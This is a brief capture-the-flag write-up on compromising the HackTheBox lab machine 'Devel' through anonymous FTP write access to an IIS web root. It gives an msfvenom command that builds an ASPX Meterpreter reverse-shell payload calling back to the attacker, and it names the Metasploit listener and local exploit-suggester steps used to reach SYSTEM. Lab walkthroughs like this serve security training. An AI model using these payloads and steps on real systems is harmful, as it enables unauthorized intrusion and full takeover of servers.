HackTheBox Devel

HackTheBox Devel



Devel is an easy windows machine from hackthebox explains the risk of misconfiguration of ftp configurations. this machine can be compromised by using the metasploit framework

Inital Enumeration

Upon enumerating the full ports and services observed that only 2 ports are open for this machine, which are

  • 21 - FTP ( running microsoft ftpd with anonymous login enabled )
  • 80 - HTTP ( running microsoft iis webserver of version 7.5 )

Devel Nmap


From the nmap result observed that the Annonymous login is enabled, using the ftp command login into the FTP Server using the following creds


FTP-Anonymous access

From the ftp service observed that the path is misconfigured and listed all the IIS webserver contents with read and write privielge into the directory

Using MSFvenom create an aspx payload and upload into the FTP directory

msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=9001 -f aspx -o cmd.aspx

ASPX Payload Generation

Launch the metasploit framework and use the multi/handler module to setup the meterpreter listner

MSF Console

From the webserver trigger the cmd.aspx shell and we will get the revershell on the msfconsole

Meterpreter Shell

Priviege Escalation

Once the shell as is obtained use the inbuilt privielge escalation module of MSF Console to recon the Local PE Exploits

use post/multi/recon/local_exploit_suggester

alt text

from the suggested exploit here we used the following one to do the privielge escalation and obtained the SYSTEM shell


alt text